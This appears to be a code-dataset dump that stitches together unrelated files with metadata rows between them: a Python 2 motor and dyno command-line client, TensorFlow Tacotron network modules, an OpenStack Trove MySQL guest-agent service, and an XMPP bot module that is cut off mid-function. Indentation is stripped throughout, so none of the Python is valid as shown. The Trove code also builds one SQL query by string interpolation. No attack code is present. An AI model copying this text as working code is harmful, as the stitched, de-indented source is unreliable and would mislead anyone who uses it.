targets = ['DYNO_%s' % t.upper() for t in targets]
try:
value = float(args[0])
except ValueError:
raise MotorClientError('Invalid value: "%s".' % args[0])
message.id = MOTOR_PARAMS[param]
message.value = value
failed_targets = []
for target in targets:
print 'Setting %s to %g on %s.' % (param, value, target)
if target.startswith('DYNO_'):
message.selected_motors = MotorsAsBits([target[len('DYNO_'):]])
aio_target = AioNodeNameFromDynoNickname(target[len('DYNO_'):])
success = self._TrySetParam(
message, 'kMessageTypeDynoMotorSetParam', param, target, aio_target)
else:
message.selected_motors = MotorsAsBits([target])
aio_target = AioNodeNameFromMotorNickname(target)
success = self._TrySetParam(
message, 'kMessageTypeMotorSetParam', param, target, aio_target)
if not success:
failed_targets.append(target)
if failed_targets:
raise MotorClientError('Failed to verify %s from %s.'
% (param, failed_targets))
def _TrySetParam(self, message, msg_type, param, target, aio_target):
for _ in xrange(self._NUM_RETRIES):
self._set_param_aio_client.Send(message, msg_type, OPERATOR)
for _ in xrange(self._NUM_RETRIES):
try:
_, header, ack = self._ack_param_aio_client.Recv()
if (header.source == aio_node_helper.Value(aio_target)
and header.type == message_type.kMessageTypeMotorAckParam
and ack.id == message.id and ack.value == message.value):
print '%s %s: %g' % (target, param, ack.value)
return True
except socket.timeout:
return False
return False
@cmd_client.Command(num_args=3)
def do_set_param(self, line): # pylint: disable=invalid-name
"""Sets param for a specified motor, e.g. "set_motor_param SBO Ld 3.14"."""
self._CheckMotorStatus([flags.kMotorStatusInit, flags.kMotorStatusError])
message = pack_avionics_messages.MotorSetParamMessage()
self._SetParam(line, message, self._MOTORS)
@cmd_client.Command(num_args=3)
def do_set_param_dyno(self, line): # pylint: disable=invalid-name
"""Sets param for a specified dyno, e.g. "set_dyno_param SBO Ld 3.14"."""
self._CheckDynoStatus([flags.kMotorStatusInit, flags.kMotorStatusError])
message = pack_avionics_messages.DynoMotorSetParamMessage()
self._SetParam(line, message, self._DYNOS)
def complete_set_param(self, text, line, *unused_args): # pylint: disable=invalid-name
arg_number = len(line.split())
if not text:
arg_number += 1
if arg_number == 2:
return self._CompleteArg(text, sorted(MOTORS) + ['All'])
elif arg_number == 3:
return self._CompleteArg(text, sorted(MOTOR_PARAMS.keys()))
else:
return []
complete_set_param_dyno = complete_set_param
def _GetParam(self, line, message, node_type):
targets, args = cmd_client.SelectArgs(
line.split(), MOTORS, require_some=True, select_all=True)
param, _ = cmd_client.SelectArgs(
args, MOTOR_PARAMS.keys(), require_one=True, select_all=False)
if node_type == self._DYNOS:
targets = ['DYNO_%s' % t.upper() for t in targets]
message.id = MOTOR_PARAMS[param]
failed_targets = []
for target in targets:
print 'Getting %s from %s...' % (param, target)
success = True
if target.startswith('DYNO_'):
message.selected_motors = MotorsAsBits([target[len('DYNO_'):]])
aio_target = AioNodeNameFromDynoNickname(target[len('DYNO_'):])
success = self._TryGetParam(
message, 'kMessageTypeDynoMotorGetParam', param, target, aio_target)
else:
message.selected_motors = MotorsAsBits([target])
aio_target = AioNodeNameFromMotorNickname(target)
success = self._TryGetParam(
message, 'kMessageTypeMotorGetParam', param, target, aio_target)
if not success:
failed_targets.append(target)
if failed_targets:
raise MotorClientError('Failed to get %s from %s.'
% (param, failed_targets))
def _TryGetParam(self, message, msg_type, param, target, aio_target):
for _ in xrange(self._NUM_RETRIES):
self._get_param_aio_client.Send(message, msg_type, OPERATOR)
for _ in xrange(self._NUM_RETRIES):
try:
_, header, ack = self._ack_param_aio_client.Recv()
if (header.source == aio_node_helper.Value(aio_target)
and header.type == message_type.kMessageTypeMotorAckParam
and ack.id == message.id):
print '%s %s: %g' % (target, param, ack.value)
return True
except socket.timeout:
return False
return False
@cmd_client.Command()
def do_get_param(self, line): # pylint: disable=invalid-name
self._CheckMotorStatus([flags.kMotorStatusInit, flags.kMotorStatusError])
message = pack_avionics_messages.MotorGetParamMessage()
self._GetParam(line, message, self._MOTORS)
@cmd_client.Command()
def do_get_param_dyno(self, line): # pylint: disable=invalid-name
self._CheckDynoStatus([flags.kMotorStatusInit, flags.kMotorStatusError])
message = pack_avionics_messages.DynoMotorGetParamMessage()
self._GetParam(line, message, self._DYNOS)
complete_get_param = complete_set_param
complete_get_param_dyno = complete_get_param
@cmd_client.Command()
def do_run(self, line): # pylint: disable=invalid-name
"""Runs the selected motors and/or dynos.
Specify a duration in "s" or "ms". E.g. "run 10s" or "run 300ms".
Args:
line: Command to this function.
Raises:
MotorClientError: An invalid duration was specified.
"""
if self._motors_selected:
self._CheckMotorStatus([flags.kMotorStatusArmed])
if self._dynos_selected:
self._CheckDynoStatus([flags.kMotorStatusArmed])
self._CheckTargetsSelected()
if line.endswith('ms'):
line = line[:-2]
multiplier = 1e-3
elif line.endswith('s'):
line = line[:-1]
multiplier = 1.0
else:
raise MotorClientError('Usage: run {$N {s|ms}}')
try:
duration = float(line) * multiplier
except ValueError:
raise MotorClientError('Invalid run time: \'%s\'' % line)
if self._motor_runner.IsRunning() or self._dyno_runner.IsRunning():
raise MotorClientError('Already running.')
if self._motors_selected:
if not self._motor_listener.AllMotorsArmed():
raise MotorClientError('Motors not armed.')
self._motor_runner.StartRun(duration)
if self._dynos_selected:
if not self._dyno_listener.AllMotorsArmed():
raise MotorClientError('Dynos not armed.')
self._dyno_runner.StartRun(duration)
print 'Running...'
@cmd_client.Command(num_args=0)
def do_stop(self, unused_line): # pylint: disable=invalid-name
"""Stops the motors and/or dynos."""
if self._motor_runner.IsRunning() or self._dyno_runner.IsRunning():
self._motor_runner.StopRun()
self._dyno_runner.StopRun()
else:
raise MotorClientError('Not running.')
print 'Run stopped.'
def _GetCommandFunction(self, line):
"""Returns a complete command function for each selected motor and/or dyno.
Args:
line: Command to this function.
Raises:
MotorClientError: Motors and/or dynos are running.
Returns:
torque_func: A function that returns torque commands.
omega_lower_func: A function that returns omega_lower commands.
omega_upper_func: A function that returns omega_upper commands.
freeze_command: Specifies if last command should persist on stop.
"""
if self._motor_runner.IsRunning() or self._dyno_runner.IsRunning():
raise MotorClientError('Motors and/or dynos are running.')
args = line.split()
data, loop = GenerateCommandData(args)
t = data[:, 0]
torque_cmd = data[:, 1:9]
omega_lower_cmd = data[:, 9:17]
omega_upper_cmd = data[:, 17:25]
torque_func = CommandProfile(t, torque_cmd, TORQUE_MIN_LIMIT,
TORQUE_MAX_LIMIT, 'torque', loop)
omega_lower_func = CommandProfile(t, omega_lower_cmd, OMEGA_MIN_LIMIT,
OMEGA_MAX_LIMIT, 'omega', loop)
omega_upper_func = CommandProfile(t, omega_upper_cmd, OMEGA_MIN_LIMIT,
OMEGA_MAX_LIMIT, 'omega', loop)
freeze_command = False
return (torque_func, omega_lower_func, omega_upper_func, freeze_command)
@cmd_client.Command(num_args=[1, 2])
def do_set_command_function(self, line): # pylint: disable=invalid-name, g-doc-args
# pylint: disable=g-doc-args
"""Sets a command function for motor(s).
Specify a filename which may be:
- A Python file (must have .py suffix) corresponding to an input to
gen_lookup_table.py
- A text file whose output is a lookup table formatted per the output of
gen_lookup_table.py.
"""
self._CheckMotorStatus(
[flags.kMotorStatusInit, flags.kMotorStatusArmed,
flags.kMotorStatusError])
cmd_args = self._GetCommandFunction(line)
self._motor_runner.SetCommandFunction(*cmd_args)
@cmd_client.Command(num_args=[1, 2])
def do_set_command_function_dyno(self, line): # pylint: disable=invalid-name
# pylint: disable=g-doc-args
"""Sets a command function for dyno(s).
Specify a filename which may be:
- A Python file (must have .py suffix) corresponding to an input to
gen_lookup_table.py
- A text file whose output is a lookup table formatted per the output of
gen_lookup_table.py.
"""
self._CheckDynoStatus(
[flags.kMotorStatusInit, flags.kMotorStatusArmed,
flags.kMotorStatusError])
cmd_args = self._GetCommandFunction(line)
self._dyno_runner.SetCommandFunction(*cmd_args)
def complete_set_motor_command_function(self, _, line, *unused_args): # pylint: disable=invalid-name
"""Completes arguments for the "set_command_function" command."""
args = line.split(None, 2)
if len(args) > 2 or (len(args) == 2 and line.endswith(' ')):
suggestions = ['noloop', 'loop']
if len(args) == 3:
if args[2] in suggestions:
return []
suggestions = [x for x in suggestions if x.startswith(args[2])]
else:
path = args[1] if len(args) == 2 else ''
suggestions = cmd_client.CompleteFile(path)
suggestions = [x for x in suggestions
if (x.endswith(('/', '.py', '.pycmd', '.txt', '.dat'))
or x.find('.') < 0)]
return suggestions
complete_set_dyno_command_function = complete_set_motor_command_function
@cmd_client.Command(num_args=2)
def do_set_speed_limits(self, line): # pylint: disable=invalid-name
"""Sets the speed limits for torque-mode e.g. set_speed_limits 100 200."""
if not self._dynos_selected:
raise MotorClientError('No dynos selected. Use "set_targets_dyno".')
args = line.split()
try:
omega_lower = float(args[0])
omega_upper = float(args[1])
except ValueError:
raise MotorClientError('Invalid argument(s): \'{:s}\''.format(line))
CheckCommandLimits(
omega_lower, omega_upper, OMEGA_MIN_LIMIT, OMEGA_MAX_LIMIT, 'omega')
self._omega_lower_limit = omega_lower
self._omega_upper_limit = omega_upper
print 'Omega limits set to: %.2f rad/s, %.2f rad/s.' % (
self._omega_lower_limit, self._omega_upper_limit)
torque_func = lambda _: self._torque
omega_lower_func = lambda _: self._omega_lower_limit
omega_upper_func = lambda _: self._omega_upper_limit
freeze_command = True
self._dyno_runner.SetCommandFunction(torque_func, omega_lower_func,
omega_upper_func, freeze_command)
@cmd_client.Command(num_args=1)
def do_set_torque(self, line): # pylint: disable=invalid-name
"""Sets motor torque."""
if not self._dynos_selected:
raise MotorClientError('No dynos selected. Use "set_targets_dyno".')
try:
torque = float(line)
except ValueError:
raise MotorClientError('Invalid argument(s): \'{:s}\''.format(line))
if self._omega_lower_limit == 0 and self._omega_upper_limit == 0:
raise MotorClientError('Omega limits not set. Use "set_speed_limits".')
CheckCommandLimits(
torque, torque, TORQUE_MIN_LIMIT, TORQUE_MAX_LIMIT, 'torque')
self._torque = torque
print 'Torque desired: %.2f Nm. Speed limits: %.2f rad/s, %.2f rad/s.' % (
torque, self._omega_lower_limit, self._omega_upper_limit)
torque_func = lambda _: self._torque
omega_lower_func = lambda _: self._omega_lower_limit
omega_upper_func = lambda _: self._omega_upper_limit
freeze_command = True
self._dyno_runner.SetCommandFunction(torque_func, omega_lower_func,
omega_upper_func, freeze_command)
@cmd_client.Command(num_args=1)
def do_set_omega(self, line): # pylint: disable=invalid-name
"""Sets motor speed."""
if not self._motors_selected:
raise MotorClientError('No motors selected. Use "set_targets".')
try:
omega = float(line)
except ValueError:
raise MotorClientError('Invalid omega: \'{:s}\''.format(line))
CheckCommandLimits(omega, omega, OMEGA_MIN_LIMIT, OMEGA_MAX_LIMIT, 'omega')
print 'Omega desired: %s rad/s' % omega
torque_func = lambda _: 0.0
omega_lower_func = lambda _: omega
omega_upper_func = lambda _: omega
freeze_command = True
self._motor_runner.SetCommandFunction(torque_func, omega_lower_func,
omega_upper_func, freeze_command)
def _RampCommand(self, line, cmd_type, runner):
"""Sets a motor speed or torque ramp.
Args:
line: Command to this function.
cmd_type: Torque or Omega command to ramp.
runner: Runner instance to use for setting command.
Raises:
MotorClientError: An invalid parameter was specified.
"""
args = line.split(None, 2)
try:
cmd = float(args[0])
except ValueError:
raise MotorClientError('Invalid %s: \'{:s}\''.format(args[0]) % cmd_type)
if len(args) == 2:
try:
dt = self._dt = float(args[1])
except ValueError:
raise MotorClientError('Invalid time: \'{:s}\''.format(args[1]))
else:
dt = 1.0
if runner.IsRunning():
t0 = runner.GetTime()
motor_cmd = runner.GetCommand()
cmd0 = motor_cmd[cmd_type]
else:
t0 = 0.0
cmd0 = 0.0
dcmd_dt = (cmd - cmd0) / dt if abs(dt) > 10.0 * EPS32 else 0.0
def Ramp(t):
if t > t0 + dt:
return cmd
elif t > t0:
return dcmd_dt * (t - t0) + cmd0
else:
return cmd0
if cmd_type == 'omega_upper':
torque_func = lambda _: 0.0
omega_lower_func = Ramp
omega_upper_func = Ramp
elif cmd_type == 'torque':
torque_func = Ramp
omega_lower_func = lambda _: self._omega_lower_limit
omega_upper_func = lambda _: self._omega_upper_limit
else:
raise MotorClientError('Invalid command type: %s' % cmd_type)
freeze_command = True
runner.SetCommandFunction(
torque_func, omega_lower_func, omega_upper_func, freeze_command)
display_cmd = cmd_type.split('_')[0].capitalize()
print (' Ramping over dt = %4.2f:\n'
' %s(t0) = %4.1f\n'
' %s(t0 + dt) = %4.1f' % (dt, display_cmd, cmd0, display_cmd, cmd))
@cmd_client.Command(num_args=[1, 2])
def do_ramp_omega(self, line): # pylint: disable=invalid-name
# pylint: disable=g-doc-args
"""Sets a motor speed ramp.
Specify a linear angular rate ramp from the present speed omega0 to a final
speed omega1 over some time dt (in seconds) with the command:
ramp_omega [omega1] [dt]
The second argument is optional. If not specified dt = 1s is assumed.
"""
self._RampCommand(line, 'omega_upper', self._motor_runner)
@cmd_client.Command(num_args=[1, 2])
def do_ramp_torque(self, line): # pylint: disable=invalid-name
# pylint: disable=g-doc-args
"""Sets a dyno torque ramp.
Specify a linear torque ramp from the present torque T0 to a final
torque T1 over some time dt (in seconds) with the command:
ramp_torque [T1] [dt]
The second argument is optional. If not specified dt = 1s is assumed.
"""
self._RampCommand(line, 'torque', self._dyno_runner)
@cmd_client.Command(num_args=0)
def do_clear_errors(self, unused_line): # pylint: disable=invalid-name
self._CheckTargetsSelected()
if self._motors_selected:
self._CheckMotorStatus([flags.kMotorStatusInit, flags.kMotorStatusError])
self._motor_listener.ClearErrors()
self._motor_runner.ClearErrors()
if self._dynos_selected:
self._CheckDynoStatus([flags.kMotorStatusInit, flags.kMotorStatusError])
self._dyno_listener.ClearErrors()
self._dyno_runner.ClearErrors()
print 'Errors cleared.'
def _TryDisarm(self, node_type):
listener, runner = self._GetListenerAndRunner(node_type)
for _ in xrange(self._NUM_RETRIES):
runner.Disarm()
time.sleep(0.1)
if listener.AllMotorsDisarmed():
print 'Successfully disarmed %s.' % node_type
return
raise MotorClientError('Failed to disarm %s.' % node_type)
@cmd_client.Command(num_args=0)
def do_disarm(self, unused_line): # pylint: disable=invalid-name
"""Disarms the motors."""
self._CheckTargetsSelected()
print 'Disarming.'
if self._motors_selected:
self._TryDisarm(self._MOTORS)
if self._dynos_selected:
self._TryDisarm(self._DYNOS)
@cmd_client.Command()
def do_get_errors(self, unused_line): # pylint: disable=invalid-name
self._CheckTargetsSelected()
if self._motors_selected:
self._motor_listener.PrintErrors()
if self._dynos_selected:
self._dyno_listener.PrintErrors()
@cmd_client.Command()
def do_request_control_log(self, unused_line): # pylint: disable=invalid-name
self._CheckTargetsSelected()
if self._motors_selected:
self._motor_runner.RequestControlLog()
if self._dynos_selected:
self._dyno_runner.RequestControlLog()
@cmd_client.Command()
def do_request_adc_log(self, unused_line): # pylint: disable=invalid-name
self._CheckTargetsSelected()
if self._motors_selected:
self._motor_runner.RequestAdcLog()
if self._dynos_selected:
self._dyno_runner.RequestAdcLog()
class Listener(cmd_client.AioThread):
"""Continuously listens to MotorStatusMessages."""
def __init__(self, error_callback, motors, dyno_mode=False):
self._motors = motors.copy()
t_now = time.time()
self._errors = {m: flags.kMotorErrorNone for m in MOTORS}
self._warnings = {m: flags.kMotorWarningNone for m in MOTORS}
self._error_lock = threading.Lock()
self._clear_errors_stop_time = t_now
self._motor_status = {m: flags.kMotorStatusInit
for m in self._motors}
self._motor_status_lock = threading.Lock()
self._t_message = {m: t_now for m in self._motors}
self._t_message_lock = threading.Lock()
self._dyno_mode = dyno_mode
if dyno_mode:
sources = {AioNodeNameFromDynoNickname(m): m for m in self._motors}
else:
sources = {AioNodeNameFromMotorNickname(m): m for m in self._motors}
self._motor_sources = {aio.aio_node_helper.Value(k): sources[k]
for k in sources.keys()}
self._error_callback = error_callback
super(Listener, self).__init__(['kMessageTypeMotorStatus'],
allowed_sources=sources.keys(), timeout=0.1)
self.start()
def ClearErrors(self):
with self._error_lock:
for motor in self._errors.keys():
self._errors[motor] = flags.kMotorErrorNone
self._warnings[motor] = flags.kMotorWarningNone
self._clear_errors_stop_time = time.time() + 5*10e-3
def GetMostRestrictiveMotorStatus(self):
"""Returns the most restrictive status across all motors."""
with self._motor_status_lock:
motor_statuses = self._motor_status.values()
if flags.kMotorStatusRunning in motor_statuses:
return flags.kMotorStatusRunning
elif flags.kMotorStatusArmed in motor_statuses:
return flags.kMotorStatusArmed
elif flags.kMotorStatusError in motor_statuses:
return flags.kMotorStatusError
return flags.kMotorStatusInit
def AllMotorsArmed(self):
with self._motor_status_lock:
motor_statuses = self._motor_status.values()
return all(x == flags.kMotorStatusArmed for x in motor_statuses)
def AnyMotorsArmed(self):
with self._motor_status_lock:
motor_statuses = self._motor_status.values()
return any(x == flags.kMotorStatusArmed for x in motor_statuses)
def AllMotorsDisarmed(self):
with self._motor_status_lock:
motor_statuses = self._motor_status.values()
return all(x != flags.kMotorStatusArmed
and x != flags.kMotorStatusRunning
for x in motor_statuses)
def GetUnarmedMotors(self):
with self._motor_status_lock:
return [motor for motor, status in self._motor_status.iteritems()
if status == flags.kMotorStatusInit]
def PrintErrors(self):
with self._error_lock:
if (any([e != flags.kMotorErrorNone for e in self._errors.itervalues()])
or any([w != flags.kMotorWarningNone
for w in self._warnings.itervalues()])):
print 'Errors:'
for motor in MOTORS:
error = self._errors[motor]
warning = self._warnings[motor]
if error != flags.kMotorErrorNone:
print '%s: %s' % (motor, ' | '.join(GetMotorErrorNames(error)))
motor = (' ') * len(motor) # Do no print out the motor name again.
if warning != flags.kMotorWarningNone:
print '%s: %s' % (motor, ' | '.join(GetMotorWarningNames(warning)))
else:
print 'No errors or warnings.'
def _RunOnce(self):
try:
_, header, msg = self._client.Recv()
motor = self._motor_sources[header.source]
t_now = time.time()
with self._t_message_lock:
self._t_message[motor] = t_now
stale = {m: t_now - self._t_message[m] > 0.05 for m in self._motors}
new_status = False
execute_callback = False
with self._error_lock, self._motor_status_lock:
# New errors.
if t_now > self._clear_errors_stop_time:
newline = '\n'
error_diff = self._errors[motor] ^ msg.motor_error
if msg.motor_error and error_diff:
self._errors[motor] |= msg.motor_error
print ('%sNew motor error(s) %s: %s' %
(newline, motor, ' | '.join(GetMotorErrorNames(error_diff))))
newline = '' # Group errors and warning from the same motor.
warning_diff = self._warnings[motor] ^ msg.motor_warning
if warning_diff:
self._warnings[motor] = msg.motor_warning
if msg.motor_warning & warning_diff:
print ('%sNew motor warning(s) %s: %s' %
(newline, motor,
' | '.join(GetMotorWarningNames(warning_diff
& msg.motor_warning))))
else:
print ('%sCleared motor warning(s) %s: %s' %
(newline, motor,
' | '.join(GetMotorWarningNames(warning_diff
& ~msg.motor_warning))))
# Change in status.
if self._motor_status[motor] != msg.motor_status:
new_status = True
self._motor_status[motor] = msg.motor_status
# Invoke error callback after giving up self._error_lock and
# self._status_lock just in case.
if (new_status and
any([e for e in self._errors.values()]) and
all([self._motor_status[motor] &
~(flags.kMotorStatusRunning | flags.kMotorStatusWindDown) or
stale[motor] for motor in self._motors])):
execute_callback = True
if execute_callback:
self._error_callback()
except socket.timeout:
pass
class Runner(cmd_client.AioThread):
"""Continuously sends ControllerCommandMessages."""
def __init__(self, motors, spin_dir, dyno_mode=False):
self._motors = motors.copy()
self._spin_dir = [spin_dir.get(motor, 1) for motor in MOTORS]
self._clear_error_retries = 0
self._disarm_retries = 0
self._request_control_log = False
self._request_adc_log = False
self._dyno_mode = dyno_mode
if dyno_mode:
self._command = pack_avionics_messages.DynoCommandMessage()
else:
self._command = pack_avionics_messages.ControllerCommandMessage()
self._command.motor_command = flags.kMotorCommandNone
self._command_lock = threading.Lock()
self._command_function_lock = threading.Lock()
self._torque_func = lambda _: 0.0
self._omega_lower_func = lambda _: 0.0
self._omega_upper_func = lambda _: 0.0
self._freeze_command = False # Replace command with a constant on stop.
self._WriteMotorCommand()
super(Runner, self).__init__(['kMessageTypeControllerCommand',
'kMessageTypeDynoCommand'])
self.start()
def SetCommand(self, command_mask):
with self._command_lock:
self._command.motor_command |= command_mask
def _ClearCommand(self, command_mask):
with self._command_lock:
self._command.motor_command &= ~command_mask
def IsRunning(self):
return self._command.motor_command & flags.kMotorCommandRun
def StartRun(self, duration):
self._start_time = time.time()
self._stop_time = self._start_time + duration
self.SetCommand(flags.kMotorCommandRun)
def StopRun(self):
if self._freeze_command:
motor_cmd = self.GetCommand()
with self._command_function_lock:
self._torque_func = lambda _: motor_cmd['torque']
self._omega_lower_func = lambda _: motor_cmd['omega_lower']
self._omega_upper_func = lambda _: motor_cmd['omega_upper']
self._ClearCommand(flags.kMotorCommandRun)
def GetCommand(self):
"""Generates motor commands at the current time.
Returns:
motor_cmd: Command to send to motors or dynos at the current time.
"""
if self.IsRunning():
curr_time = time.time() - self._start_time
else:
curr_time = 0.0
with self._command_function_lock:
motor_cmd = {'torque': self._torque_func(curr_time),
'omega_lower': self._omega_lower_func(curr_time),
'omega_upper': self._omega_upper_func(curr_time)}
return motor_cmd
def _CheckCommand(self, cmd_dict):
for _, val in cmd_dict.iteritems():
assert isinstance(val, list)
assert len(val) == len(MOTORS)
def _WriteMotorCommand(self):
motor_cmd = self.GetCommand()
for cmd, val in motor_cmd.iteritems():
if isinstance(val, int) or isinstance(val, float):
motor_cmd[cmd] = [val for _ in MOTORS]
self._CheckCommand(motor_cmd)
torque = motor_cmd['torque']
omega_lower = motor_cmd['omega_lower']
omega_upper = motor_cmd['omega_upper']
with self._command_lock:
for i, motor in enumerate(MOTORS):
spin = self._spin_dir[i]
if motor in self._motors:
self._command.motor_torque[i] = torque[i] * spin
self._command.motor_speed_lower_limit[i] = omega_lower[i] * spin
self._command.motor_speed_upper_limit[i] = omega_upper[i] * spin
else:
self._command.motor_torque[i] = 0.0
self._command.motor_speed_lower_limit[i] = 0.0
self._command.motor_speed_upper_limit[i] = 0.0
def SetCommandFunction(self, torque_func, omega_lower_func,
omega_upper_func, freeze_command):
with self._command_function_lock:
self._torque_func = torque_func
self._omega_lower_func = omega_lower_func
self._omega_upper_func = omega_upper_func
self._freeze_command = freeze_command
self._WriteMotorCommand()
def GetTime(self):
return time.time() - self._start_time if self.IsRunning() else 0.0
def ClearErrors(self):
self.SetCommand(flags.kMotorCommandClearError)
self._clear_error_retries = 3
def Disarm(self):
self.SetCommand(flags.kMotorCommandDisarm)
self._disarm_retries = 3
def RequestControlLog(self):
self._request_control_log = True
def RequestAdcLog(self):
self._request_adc_log = True
def _RunOnce(self):
"""Modifies and sends the ControllerCommandMessage."""
if self.IsRunning():
if time.time() > self._stop_time:
self.StopRun()
print '\nFinished run.'
else:
try:
self._WriteMotorCommand()
except AssertionError:
print ('Warning: Command(t) did not return a scalar or list with '
'elements for all motors.')
self.StopRun()
if self._clear_error_retries <= 0:
self._ClearCommand(flags.kMotorCommandClearError)
else:
self._clear_error_retries -= 1
if self._disarm_retries <= 0:
self._ClearCommand(flags.kMotorCommandDisarm)
else:
self._disarm_retries -= 1
if self._request_control_log:
self.SetCommand(flags.kMotorCommandSendControlLog)
self._request_control_log = False
else:
self._ClearCommand(flags.kMotorCommandSendControlLog)
if self._request_adc_log:
self.SetCommand(flags.kMotorCommandSendAdcLog)
self._request_adc_log = False
else:
self._ClearCommand(flags.kMotorCommandSendAdcLog)
with self._command_lock:
if self._dyno_mode:
self._client.Send(self._command, 'kMessageTypeDynoCommand', OPERATOR)
else:
self._client.Send(self._command, 'kMessageTypeControllerCommand',
CONTROLLER)
time.sleep(0.0095)
if __name__ == '__main__':
client = MotorCommandClient()
try:
client.cmdloop()
except BaseException:
client.TryStopThreads()
raise
| apache-2.0 | -5,446,123,190,470,756,000 | 35.626277 | 103 | 0.645343 | false | 3.509442 | false | false | false |
JarbasAI/JarbasAI | jarbas_models/tf_tacotron/models/modules.py | 1 | 3455 | import tensorflow as tf
from tensorflow.contrib.rnn import GRUCell
def prenet(inputs, is_training, layer_sizes=[256, 128], scope=None):
x = inputs
drop_rate = 0.5 if is_training else 0.0
with tf.variable_scope(scope or 'prenet'):
for i, size in enumerate(layer_sizes):
dense = tf.layers.dense(x, units=size, activation=tf.nn.relu,
name='dense_%d' % (i + 1))
x = tf.layers.dropout(dense, rate=drop_rate,
name='dropout_%d' % (i + 1))
return x
def encoder_cbhg(inputs, input_lengths, is_training):
return cbhg(
inputs,
input_lengths,
is_training,
scope='encoder_cbhg',
K=16,
projections=[128, 128])
def post_cbhg(inputs, input_dim, is_training):
return cbhg(
inputs,
None,
is_training,
scope='post_cbhg',
K=8,
projections=[256, input_dim])
def cbhg(inputs, input_lengths, is_training, scope, K, projections):
with tf.variable_scope(scope):
with tf.variable_scope('conv_bank'):
# Convolution bank: concatenate on the last axis to stack channels from all convolutions
conv_outputs = tf.concat(
[conv1d(inputs, k, 128, tf.nn.relu, is_training,
'conv1d_%d' % k) for k in range(1, K + 1)],
axis=-1
)
# Maxpooling:
maxpool_output = tf.layers.max_pooling1d(
conv_outputs,
pool_size=2,
strides=1,
padding='same')
# Two projection layers:
proj1_output = conv1d(maxpool_output, 3, projections[0], tf.nn.relu,
is_training, 'proj_1')
proj2_output = conv1d(proj1_output, 3, projections[1], None,
is_training, 'proj_2')
# Residual connection:
highway_input = proj2_output + inputs
# Handle dimensionality mismatch:
if highway_input.shape[2] != 128:
highway_input = tf.layers.dense(highway_input, 128)
# 4-layer HighwayNet:
for i in range(4):
highway_input = highwaynet(highway_input, 'highway_%d' % (i + 1))
rnn_input = highway_input
# Bidirectional RNN
outputs, states = tf.nn.bidirectional_dynamic_rnn(
GRUCell(128),
GRUCell(128),
rnn_input,
sequence_length=input_lengths,
dtype=tf.float32)
return tf.concat(outputs, axis=2) # Concat forward and backward
def highwaynet(inputs, scope):
with tf.variable_scope(scope):
H = tf.layers.dense(
inputs,
units=128,
activation=tf.nn.relu,
name='H')
T = tf.layers.dense(
inputs,
units=128,
activation=tf.nn.sigmoid,
name='T',
bias_initializer=tf.constant_initializer(-1.0))
return H * T + inputs * (1.0 - T)
def conv1d(inputs, kernel_size, channels, activation, is_training, scope):
with tf.variable_scope(scope):
conv1d_output = tf.layers.conv1d(
inputs,
filters=channels,
kernel_size=kernel_size,
activation=activation,
padding='same')
return tf.layers.batch_normalization(conv1d_output,
training=is_training)
| gpl-3.0 | 2,314,599,216,257,785,300 | 31.28972 | 100 | 0.541245 | false | 3.767721 | false | false | false |
zhangg/trove | trove/guestagent/datastore/mysql/service.py | 1 | 3685 | # Copyright 2013 OpenStack Foundation
# Copyright 2013 Rackspace Hosting
# Copyright 2013 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from oslo_log import log as logging
from trove.common.i18n import _
from trove.guestagent.datastore.mysql_common import service
LOG = logging.getLogger(__name__)
CONF = service.CONF
class KeepAliveConnection(service.BaseKeepAliveConnection):
pass
class MySqlAppStatus(service.BaseMySqlAppStatus):
pass
class LocalSqlClient(service.BaseLocalSqlClient):
pass
class MySqlApp(service.BaseMySqlApp):
def __init__(self, status):
super(MySqlApp, self).__init__(status, LocalSqlClient,
KeepAliveConnection)
# DEPRECATED: Mantain for API Compatibility
def get_txn_count(self):
LOG.info(_("Retrieving latest txn id."))
txn_count = 0
with self.local_sql_client(self.get_engine()) as client:
result = client.execute('SELECT @@global.gtid_executed').first()
for uuid_set in result[0].split(','):
for interval in uuid_set.split(':')[1:]:
if '-' in interval:
iparts = interval.split('-')
txn_count += int(iparts[1]) - int(iparts[0])
else:
txn_count += 1
return txn_count
def _get_slave_status(self):
with self.local_sql_client(self.get_engine()) as client:
return client.execute('SHOW SLAVE STATUS').first()
def _get_master_UUID(self):
slave_status = self._get_slave_status()
return slave_status and slave_status['Master_UUID'] or None
def _get_gtid_executed(self):
with self.local_sql_client(self.get_engine()) as client:
return client.execute('SELECT @@global.gtid_executed').first()[0]
def get_last_txn(self):
master_UUID = self._get_master_UUID()
last_txn_id = '0'
gtid_executed = self._get_gtid_executed()
for gtid_set in gtid_executed.split(','):
uuid_set = gtid_set.split(':')
if uuid_set[0] == master_UUID:
last_txn_id = uuid_set[-1].split('-')[-1]
break
return master_UUID, int(last_txn_id)
def get_latest_txn_id(self):
LOG.info(_("Retrieving latest txn id."))
return self._get_gtid_executed()
def wait_for_txn(self, txn):
LOG.info(_("Waiting on txn '%s'."), txn)
with self.local_sql_client(self.get_engine()) as client:
client.execute("SELECT WAIT_UNTIL_SQL_THREAD_AFTER_GTIDS('%s')"
% txn)
class MySqlRootAccess(service.BaseMySqlRootAccess):
def __init__(self):
super(MySqlRootAccess, self).__init__(LocalSqlClient,
MySqlApp(MySqlAppStatus.get()))
class MySqlAdmin(service.BaseMySqlAdmin):
def __init__(self):
super(MySqlAdmin, self).__init__(LocalSqlClient, MySqlRootAccess(),
MySqlApp)
get_engine = MySqlApp.get_engine
| apache-2.0 | -3,997,285,619,942,811,600 | 33.764151 | 78 | 0.612212 | false | 3.907741 | false | false | false |
mikemintz/neutron | modules/iq.py | 1 | 4752 | # -*- coding: koi8-r -*-
## OJAB iq module
## Copyright (C) Boris Kotov <[email protected]>
##
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.
# Modified by me :) Gh0st AKA Bohdan Turkynewych
import os, xmpp, time
messages=None
global version
global vername
ver_queue={}
time_queue={}
iq_id=1
def versioncmd(conn, msg, args, replyto):
if args=="":
target=msg.getFrom()
else:
target=("%s/%s"%(replyto, args))
req=xmpp.protocol.Iq('get', xmpp.NS_VERSION, {}, target)
req.setID(iq_id)
